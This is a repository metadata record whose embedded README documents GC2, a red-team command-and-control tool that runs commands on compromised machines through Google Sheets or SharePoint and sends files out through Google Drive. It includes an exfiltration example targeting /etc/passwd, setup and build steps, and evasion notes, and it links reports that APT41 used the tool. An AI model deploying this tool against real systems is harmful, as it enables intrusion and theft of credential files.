{"id":13842128,"url":"https://github.com/looCiprian/GC2-sheet","last_synced_at":"2025-07-11T14:30:46.915Z","repository":{"id":40761606,"uuid":"406894514","full_name":"looCiprian/GC2-sheet","owner":"looCiprian","description":"GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet or Microsoft SharePoint List and exfiltrate files using Google Drive or Microsoft SharePoint Document.","archived":false,"fork":false,"pushed_at":"2024-09-04T18:00:28.000Z","size":1737,"stargazers_count":521,"open_issues_count":0,"forks_count":105,"subscribers_count":15,"default_branch":"master","last_synced_at":"2024-09-06T01:20:18.255Z","etag":null,"topics":["c2","command-and-control","golang","google","google-drive","google-sheet","malware"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/looCiprian.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"security/yara/gc2-1.yar","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-09-15T19:06:12.000Z","updated_at":"2024-09-05T05:33:29.000Z","dependencies_parsed_at":"2024-09-06T00:15:04.756Z","dependency_job_id":"e0be62b6-207e-4a0a-9d6a-74108fa1be1d","html_url":"https://github.com/looCiprian/GC2-sheet","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/looCiprian%2FGC2-sheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/looCiprian%2FGC2-sheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/looCiprian%2FGC2-sheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/looCiprian%2FGC2-sheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/looCiprian","download_url":"https://codeload.github.com/looCiprian/GC2-sheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729853,"owners_count":17515177,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2","command-and-control","golang","google","google-drive","google-sheet","malware"],"created_at":"2024-08-04T17:01:27.744Z","updated_at":"2025-07-11T14:30:46.902Z","avatar_url":"https://github.com/looCiprian.png","language":"Go","funding_links":["https://www.paypal.com/donate?hosted_button_id=8EWYXPED4ZU5E"],"categories":["Go"],"sub_categories":[],"readme":"# GC2\n\n\u003cp align=\"center\"\u003e\n  \u003cimg alt=\"Logo\" src=\"img/GC2.png\" height=\"30%\" width=\"30%\"\u003e\n\u003c/p\u003e\n\nGC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet or Microsoft SharePoint List and exfiltrate files using Google Drive or Microsoft SharePoint Document.\n\n# Why\n\nThis project has been developed to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, ...) during Red Teaming activities.\n\nFurthermore, the program will interact only with Google and Microsoft's domains (like *.google.com) to make network detection more difficult.\n\n# Workflow\n\n## Google\n\u003cp align=\"center\"\u003e\n  \u003cimg alt=\"Work Flow\" src=\"img/Google_workflow.png\" height=\"60%\" width=\"60%\"\u003e\n\u003c/p\u003e\n\n## Microsoft\n\u003cp align=\"center\"\u003e\n  \u003cimg alt=\"Work Flow\" src=\"img/Microsoft_workflow.png\" height=\"60%\" width=\"60%\"\u003e\n\u003c/p\u003e\n\n# Features\n\n- **Command execution** using Google Sheet or Microsoft SharePoint List as a console\n- **Download files** on the target using Google Drive or Microsoft SharePoint Document\n- **Data exfiltration** using Google Drive or Microsoft SharePoint Document\n- Self-kill switch and **auto-delete** from the target machine\n\n## Command execution\n\n### Google\n\nA Google Sheet will be automatically created by the C2. Once created you can interact with the compromised system as shown below.\n\n   \u003cp align=\"center\"\u003e\n        \u003cimg alt=\"Sheet Permission\" src=\"img/Google_usage.png\" height=\"60%\" width=\"60%\"\u003e\n    \u003c/p\u003e\n\n### Microsoft\n\nA Microsoft SharePoint List will be automatically created by the C2. Once created you can interact with the compromised system as shown below.\n\n   \u003cp align=\"center\"\u003e\n        \u003cimg alt=\"Sheet Permission\" src=\"img/Microsoft_usage.png\" height=\"60%\" width=\"60%\"\u003e\n    \u003c/p\u003e\n\n## Data exfiltration file\n\nSpecial command is reserved to exfiltrate files form the target system.\n\n ```\nFrom Target to Google Drive/Microsoft SharePoint Document\nupload;\u003clocal path\u003e\nExample:\nupload;/etc/passwd\n ```\n\nNote: files with the same name are automatically overwritten.\n\n## Download file\n\nSpecial command is reserved to download files to the target system.\n\n#### Google\n ```\n From Google Drive to Target\ndownload;\u003cgoogle drive file id\u003e;\u003clocal path\u003e\nExample:\ndownload;\u003cfile ID\u003e;/home/user/downloaded.txt\n ```\n\n#### Microsoft\nNote: Files need to be saved in the SharePoint root folder, usually \"Documents\"\n ```\n From SharePoint to Target\ndownload;\u003cSharePoint file path\u003e;\u003clocal path\u003e\nExample:\ndownload;download.txt;/home/user/downloaded.txt\n ```\n\n## Exit\n\nBy sending the *exit* command, the C2 will kill and delete itself from the target system.\n\nPS: From *os* documentation:\n*If a symlink was used to start the process, depending on the operating system, the result might be the symlink or the path it pointed to*. In this case, the symlink is deleted.\n\n# Set up\n\nThis C2 support both Google (Google Sheet + Google Drive) and Microsoft (SharePoint Lists + SharePoint Document) services. To use the C2 you need to set up both the local and cloud configuration.\n\n## Cloud config\n\n### Google\n\n1. **Create a new Google \"service account\"**\n \n    Create a new Google \"service account\" using [https://console.cloud.google.com/](https://console.cloud.google.com/), create a .json key file for the service account. \n\n2. **Enable Google Sheet API and Google Drive API**\n\n    Enable Google Drive API [https://developers.google.com/drive/api/v3/enable-drive-api](https://developers.google.com/drive/api/v3/enable-drive-api) and Google Sheet API [https://developers.google.com/sheets/api/quickstart/go](https://developers.google.com/sheets/api/quickstart/go). \n\n3. **Set up Google Sheet and Google Drive**\n\n    Create a new Google Sheet and share it (as Editor) with the Service Account (by using its email).\n    \n    \u003cp align=\"center\"\u003e\n        \u003cimg alt=\"Sheet Permission\" src=\"img/Google_Sheet_permissions.png\" height=\"60%\" width=\"60%\"\u003e\n    \u003c/p\u003e\n    \n    Create a new Google Drive folder and share it (as Editor) with the Service Account (by using its email).\n    \n    \u003cp align=\"center\"\u003e\n        \u003cimg alt=\"Sheet Permission\" src=\"img/Google_Drive_permissions.png\" height=\"60%\" width=\"60%\"\u003e\n    \u003c/p\u003e    \n\n### Microsoft\n\nTo interact with Microsoft services you will first need a Business subscription (you can get one for free for the first 30 days).\n\n1. **Create an Azure Application**\n\n   Create a new Azure Aapplication as described here [https://learn.microsoft.com/en-us/graph/auth-v2-service?tabs=http](https://learn.microsoft.com/en-us/graph/auth-v2-service?tabs=http)\n\n    \u003cp align=\"center\"\u003e\n        \u003cimg alt=\"Sheet Permission\" src=\"img/Microsoft_Azure_application.png\" height=\"60%\" width=\"60%\"\u003e\n    \u003c/p\u003e\n\n   After creating the new application, enable the following Graph APIs:\n   - Sites.ReadWrite.All\n   - Files.ReadWrite.All\n\n    \u003cp align=\"center\"\u003e\n        \u003cimg alt=\"Sheet Permission\" src=\"img/Microsoft_Azure_application_API.png\" height=\"60%\" width=\"60%\"\u003e\n    \u003c/p\u003e\n\n### Local config\n\n1. **Download the C2**\n\n    The C2 can be cloned directly from GitHub:\n\n    ```\n    git clone https://github.com/looCiprian/GC2-sheet\n    cd GC2-sheet\n    ```\n\n5. **Configure the C2**\n\n    To configure the C2 you need to modify the `cmd/options.yml` file. The C2 supports both Google and Microsoft services, mixing them is also possible.\n\n   *Only Google services*\n\n    ```\n   CommandService: \"Google\" # Google Sheet will be used as command service to pull commands and push commands' output\n   FileSystemService: \"Google\" # Google Drive will be used as file system to download and exfiltrate files\n   GoogleServiceAccountKey : \"1234567890\" # your escaped json file\n   GoogleSheetID: \"0987654321\" # your Google Sheet ID (can be found in the URL)\n   GoogleDriveID: \"1234554321\" # your Google Drive folder ID (can be found in the URL)\n   #RowId: 1 # optional, specify from which (Google Sheet or SharePoint List) row the beacon should pull new commands\n   #Proxy: \"http://127.0.0.1:8080\" # optional, specify the proxy\n   Verbose: true # optional, suggested for debugging purposes\n    ```\n   Your Google service account key must be escaped before pasting it in the configuration file. You can use the following command to escape it:\n\n    ```\n   cat key.json | jq -r @json | sed 's/\\\\n/\\\\\\\\n/g' | sed 's/\\\"/\\\\\"/g'\n   ```\n\n   *Only Microsoft services*\n   \n   ```\n   CommandService: \"Microsoft\" # Microsoft SharePoint List will be used as command service to pull commands and push commands' output\n   FileSystemService: \"Microsoft\" # Microsoft SharePoint Document will be used as file system to download and exfiltrate files\n   MicrosoftTenantID: \"567890098765\" # your Azure Tenant ID where the Azure Application was created\n   MicrosoftClientID: \"098765567890\" # your Azure Application ID\n   MicrosoftClientSecret: \"1234509876\" # your Azure Application Secret value\n   MicrosoftSiteID: \"0987612345\" # # your SharePoint ID\n   #RowId: 1 # optional, specify from which (Google Sheet or SharePoint List) row the beacon should pull new commands\n   #Proxy: \"http://127.0.0.1:8080\" # optional, specify the proxy\n   Verbose: true # optional, suggested for debugging purposes\n   ```\n\n   *Mixing Google and Microsoft services*\n   \n   ```\n   CommandService: \"Google\" # Google Sheet will be used as command service to pull commands and push commands' output\n   FileSystemService: \"Microsoft\" # Microsoft SharePoint Document will be used as file system to download and exfiltrate files\n   GoogleServiceAccountKey : \"1234567890\" # your escaped json file\n   GoogleSheetID: \"0987654321\" # your Google Sheet ID (can be found in the URL)\n   GoogleDriveID: \"1234554321\" # your Google Drive folder ID (can be found in the URL)\n   MicrosoftTenantID: \"567890098765\" # your Azure Tenant ID where the Azure Application was created\n   MicrosoftClientID: \"098765567890\" # your Azure Application ID\n   MicrosoftClientSecret: \"1234509876\" # your Azure Application Secret value\n   MicrosoftSiteID: \"0987612345\" # # your SharePoint ID\n   #RowId: 1 # optional, specify from which (Google Sheet or SharePoint List) row the beacon should pull new commands\n   #Proxy: \"http://127.0.0.1:8080\" # optional, specify the proxy\n   Verbose: true # optional, suggested for debugging purposes\n   ```\n\n6. **Build the executable**\n\n   Few examples on how cross compile the C2 for different OS and architecture. \n\n    ```\n   env GOOS=windows GOARCH=amd64 go build -ldflags \"-s -w -H windowsgui\"\n   env GOOS=linux GOARCH=amd64 go build -ldflags \"-s –w\"\n   env GOOS=darwin GOARCH=amd64 go build -ldflags \"-s –w\"\n    ```\n\n7. **Run**\n\n    After compiling execute it.\n\n    ```\n    ./gc2-sheet\n    ```\n   \n   The beacon will automatically create a new Google Sheet or Microsoft SharePoint List accordingly to your configuration.\n\n## Troubleshooting\n\nMost of the errors can be detected by setting the `verbose` flag to `true`. By default, the C2 does not generate any output or error information.\n\n# DEF CON Slides + demo\n\n[DEF CON Slide](https://drive.google.com/file/d/1cokEcUcxgR4pNRRF5lIXCsNW8kh4ME42/view?usp=sharing)\n\n[Demo](https://youtu.be/n2dFlSaBBKo)\n\n[Demo](https://youtu.be/pLfuZnLcR1o) by [Grant Collins](https://www.youtube.com/@collinsinfosec)\n\n# Disclaimer\n\nThe owner of this project is not responsible for any illegal usage of this program.\n\nThis is an open source project meant to be used with authorization to assess the security posture and for research purposes.\n\nThe final user is solely responsible for their actions and decisions. The use of this project is at your own risk. The owner of this project does not accept any liability for any loss or damage caused by the use of this project.\n\n# Support the project\n\n**Pull request** or [![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/donate?hosted_button_id=8EWYXPED4ZU5E)\n\n## Contributors\n[Paolo Conizzoli](https://github.com/paoloconi96)\n\n# Articles related to this tool\n\n[DEF CON 32](https://forum.defcon.org/node/249630); [DEF CON 32 Reddit](https://www.reddit.com/r/Defcon/comments/tx7tg2/mega_def_con_info_for_your_planning_enjoyment/)\n\n[Google](https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf)\n\n[The Hacker News](https://thehackernews.com/2023/04/google-uncovers-apt41s-use-of-open.html)\n\n[Reddit](https://www.reddit.com/r/cybersecurity/comments/12u3wvl/top_cybersecurity_stories_for_the_week_of_041723/)\n\n[LinkedIn](https://www.linkedin.com/pulse/hacking-tutorial-google-sheets-command-control-c2-server-maxwell-zhou/)\n\n[Bleeping Computer](https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/)\n\n[Security Affairs](https://securityaffairs.com/144915/apt/china-apt41-tool-gc2.html)\n\n[Icrewplay](https://tech.icrewplay.com/gc2-strumento-google-gruppo-cinese-apt41/?utm_content=cmp-true)\n\n[Information Security Buzz](https://informationsecuritybuzz.com/google-uncovers-apt41-tools-targeting-media-and-job-sites/)\n\n[Hackdig](http://en.hackdig.com/04/477620.htm)\n\n[Hakin9](https://hakin9.org/gc2-command-and-control-application/)\n\n[RedPacketSecurity](https://www.redpacketsecurity.com/gc2-a-command-and-control-application-that-allows-an-attacker-to-execute-commands-on-the-target-machine-using-google-sheet-and-exfiltrate-data-using-google-drive/)\n\n[Cyware](https://cyware.com/news/apt41-uses-open-source-red-teaming-tool-gc2-9eaecb18)\n\n[Kitploit](https://www.kitploit.com/2021/10/gc2-command-and-control-application.html)\n\nNews mentioning malware using the same concept:\n\n[The Hacker News - Voldemort](https://thehackernews.com/2024/08/cyberattackers-exploit-google-sheets.html)\n[Bleeping Computer - Voldemort](https://www.bleepingcomputer.com/news/security/new-voldemort-malware-abuses-google-sheets-to-store-stolen-data/)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FlooCiprian%2FGC2-sheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FlooCiprian%2FGC2-sheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FlooCiprian%2FGC2-sheet/lists"}